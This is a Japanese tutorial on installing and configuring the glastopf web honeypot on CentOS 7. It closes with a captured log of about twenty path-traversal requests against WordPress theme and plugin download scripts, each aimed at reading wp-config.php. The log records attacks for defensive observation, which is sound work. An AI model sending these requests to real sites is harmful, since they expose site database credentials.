phpMyAdminや、Wordpressのプラグインの脆弱性をつかれてクラックされるケースがある。
不審者の行動を安全に観察したい!
そんな時に使えるツールが、glastopf
このハニーポットでどんなアクセスが来るのか探ってみよう!

glastopf はwebに特化したハニーポット。
導入手順は以下の通り。

なお、導入に際して、使用したOS は CentOS 7.1.1503

各種インストール

1
yum groupinstall "Development Tools"
yum install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel php-devel libxml2-devel libxslt-devel atlas atlas-devel gcc-gfortran g++ git php php-devel wget mysql mysql-server mysql-devel libevent-headers libffi-devel
easy_install pip
yum -y install python-devel

glastopf をセットアップ

1
git clone https://github.com/glastopf/glastopf.git
cd glastopf
python setup.py install

設定ファイルを作る。

1
cd /opt/glastopf/
glastopf-runner

## エラーになるので
## 以下、修正をする。
groupadd glastopf
useradd -g glastopf -s /usr/sbin/nologin glastopf
chown -R glastopf:glastopf /opt/glastopf/

vim /opt/glastopf/glastopf.cfg
# cat /opt/glastopf/glastopf.cfg
[webserver]
host = 0.0.0.0
port = 80
uid = glastopf
gid = glastopf
proxy_enabled = False

起動

1
glastopf-runner &

起動して数日。怪しいアクセスが来てることを確認。

1
2015-06-23 13:35:40,203 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==
2015-06-23 13:35:40,600 (glastopf.glastopf) 206.190.138.84 requested GET ?sd_action=demo&file=wp-config.php
2015-06-23 13:35:40,994 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
2015-06-23 13:35:41,387 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/lote27/download.php?download=../../../wp-config.php
2015-06-23 13:35:41,769 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
2015-06-23 13:35:42,173 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
2015-06-23 13:35:42,562 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
2015-06-23 13:35:42,950 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/markant/download.php?file=../../wp-config.php
2015-06-23 13:35:43,219 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/yakimabait/download.php?file=./wp-config.php
2015-06-23 13:35:43,620 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
2015-06-23 13:35:43,997 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/felis/download.php?file=../wp-config.php
2015-06-23 13:35:44,271 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
2015-06-23 13:35:44,715 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:45,147 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/epic/includes/download.php?file=wp-config.php
2015-06-23 13:35:45,553 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:45,965 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:46,232 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
2015-06-23 13:35:46,487 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
2015-06-23 13:35:46,750 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php

良いハニーポットライフを!


参照URL: VPSにハニーポット(Glastopf) を入れてみた